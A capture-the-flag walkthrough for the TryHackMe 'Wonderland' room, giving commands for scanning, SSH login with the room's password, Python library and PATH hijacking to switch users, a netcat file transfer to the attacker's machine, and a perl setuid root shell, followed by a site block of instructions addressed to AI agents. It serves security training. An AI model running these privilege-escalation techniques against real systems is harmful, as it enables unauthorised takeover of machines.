# Wonderland

**Room Link:** <https://tryhackme.com/room/wonderland>

## Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FCQdC6p3LM0XpfSfJoa87%2Fimage.png?alt=media&#x26;token=48b28ace-d2b6-45a1-a86f-6e681ee53136" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXkPHBUC0D0u6i0PF2gWJ%2Fimage.png?alt=media&#x26;token=68ab4615-4ab1-442c-86c4-0281a1504591" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FklVUZi0rHj9YQKYwCldL%2Fimage.png?alt=media&#x26;token=b3a461b3-dba1-43e9-86ce-22f91f67ad2c" alt=""><figcaption></figcaption></figure>

I can see I'm on the right track on the browser

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZ2J1ddPIqVHGGC4rcR1e%2Fimage.png?alt=media&#x26;token=4a23b3e6-8fc6-4bd8-b057-a934ed68a380" alt=""><figcaption></figcaption></figure>

**Kali**

```
gobuster dir -u http://$VICTIM/r/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FsW2hPr5P7qRQ5aAYRo94%2Fimage.png?alt=media&#x26;token=8a6a2598-e05f-4741-9a74-ac757164b54a" alt=""><figcaption></figcaption></figure>

**Kali**

```
gobuster dir -u http://$VICTIM/r/a -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

After a few letters I was able to just guess the word it's spelling out

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F0VNpWbJMSboCyT47ay73%2Fimage.png?alt=media&#x26;token=33e7f34e-7092-449f-861b-3e31fa4b3864" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FfurVCzVQYSOjfFbBrcNU%2Fimage.png?alt=media&#x26;token=02077f95-29f9-4afc-ba1d-166047a56f8a" alt=""><figcaption></figcaption></figure>

## TCP/22 - SSH

**Kali**

```
ssh alice@$VICTIM
Pass: HowDothTheLittleCrocodileImproveHisShiningTail
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FsOwRPmgyA3HzlA9Mp5zc%2Fimage.png?alt=media&#x26;token=d2ac1f3a-c0ee-47ea-8f33-dc4499940397" alt=""><figcaption></figcaption></figure>

## Lateral Movement - Abusing Library path

**Victim**

```
sudo -l
cat /home/alice/walrus_and_the_carpenter.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7ZiRX3v1n3egBkDj2TmV%2Fimage.png?alt=media&#x26;token=e8216e6a-d82e-4e16-8a43-a30b6f8be816" alt=""><figcaption></figcaption></figure>

Using the first command we can see the path it follows, we can see the first thing it will try is the current directory so we can make a random.py script of our own and put anything we want in it.

**Victim**

```
python3 -c 'import sys; print (sys.path)'
locate random.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F5onA3Ri4kuxUhGQd4Ct3%2Fimage.png?alt=media&#x26;token=39ef6be2-c63a-4c69-9651-07a83c25db6e" alt=""><figcaption></figcaption></figure>

**Victim**

```
echo 'import os' > random.py
echo 'os.system("/bin/bash")' >> random.py
cat random.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FJbGvRQclMH4IRqWvtfeG%2Fimage.png?alt=media&#x26;token=4a87c24a-9166-4732-a7de-06f06bd6e90b" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPfD8ZsQUoqGgl7xPqj4q%2Fimage.png?alt=media&#x26;token=b6f8303c-1ddd-4d6a-a07e-2885c4350325" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPWpZNeKgWmXB2QV2g7jW%2Fimage.png?alt=media&#x26;token=35de81cd-d0ee-440e-aacb-6224c70d4586" alt=""><figcaption></figcaption></figure>

## Lateral Movement - Abusing Paths

**Kali(receiving)**

```
nc -l -p 1234 > teaParty
```

**Victim(sending)**

```
nc -w 3 $KALI 1234 < teaParty
```

### Ghidra

I opened the file in Ghidra and can see that the program is running the date command which we see outputted when we run the script. But note that the date command isn't using the full path so if we add somewhere else in our path we can run our own date command instead.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7bJUuA7glAEtO92p0801%2Fimage.png?alt=media&#x26;token=f88aa3ab-5ffe-4e0d-8d00-fcb3d06d6483" alt=""><figcaption></figcaption></figure>

I added tmp to my path

**Victim(rabbit)**

```
echo $PATH
export PATH=/tmp:$PATH
echo $PATH
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNz4ycqBZ309Ks0Sm9Wsq%2Fimage.png?alt=media&#x26;token=815a713a-421d-4e03-bc1e-793fe2534e81" alt=""><figcaption></figcaption></figure>

I'm not the hatter

**Victim(rabbit)**

```
cd /tmp
echo '#!/bin/bash' > date
echo '/bin/bash' >> date
chmod +x date
cat date
/home/rabbit/teaParty 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fc2qHcM2BLG6jp1cwhFGY%2Fimage.png?alt=media&#x26;token=bbfa9815-5f9d-4973-acf9-6ad6034a2d4c" alt=""><figcaption></figcaption></figure>

## Privilege Escalation&#x20;

**Victim(hatter)**

We can just follow what's under capabilities but only the last command as CAP\_SETID is already set for perl.

**Exploit:** <https://gtfobins.github.io/gtfobins/perl/>

```
getcap -r / 2>/dev/null
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FwFiyKTEBqPxc11RlGAAp%2Fimage.png?alt=media&#x26;token=b2fe6916-8a3a-41e9-b5eb-67a39d696324" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wonderland.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.